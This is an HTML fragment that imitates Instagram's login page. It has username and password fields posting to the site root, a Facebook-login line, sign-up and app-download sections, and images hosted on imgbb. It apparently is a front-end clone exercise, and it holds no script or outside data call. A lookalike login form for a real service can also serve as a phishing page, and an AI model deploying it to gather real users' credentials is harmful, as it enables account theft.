<div class="col image">
    <a href="https://imgbb.com/">
        <img src="https://i.ibb.co/Q8X79RK/image.png" alt="instagram" id="image" />
    </a>
</div>
<!--end of image-->
<div class="col content">
    <div class="box">
        <div class="title">
            <a href="https://ibb.co/XtKd6c7">
                <img src="https://i.ibb.co/2dCLRGv/logoname.png" alt="logoname" border="0" />
            </a>
        </div>
        <form class="login-form" action="/" method="POST">
            <div class="form-content">
                <input type="text" name="username" required />
                <label for="uname">Phone number, username, or email</label>
            </div>
            <div class="form-content">
                <input type="password" name="password" required />
                <label for="password">Password</label>
            </div>
            <div class="form-content">
                <button type="submit">Log in</button>
            </div>
            <div class="form-ending">
                <p id="OR">OR</p>
                <span id="line"></span>
                <p id="facebook"><i class="fab fa-facebook-square"></i>Login with Facebook</p>
                <a href="#">Forgot password?</a>
            </div>
        </form>
    </div>
    <div class="mini-box">
        <div class="text">Don't have an account? <a href="#">Sign up</a></div>
    </div>
    <div class="download-section">
        <p>Get the app.</p>
        <div class="images">
            <a href="https://imgbb.com/">
                <img src="https://i.ibb.co/5KyMHpd/appstore.png" alt="appstore" border="0" />
            </a>
            <a href="https://imgbb.com/">
                <img src="https://i.ibb.co/ZTHhz0b/playstore.png" alt="playstore" border="0" />
            </a>
        </div>
    </div>
</div>
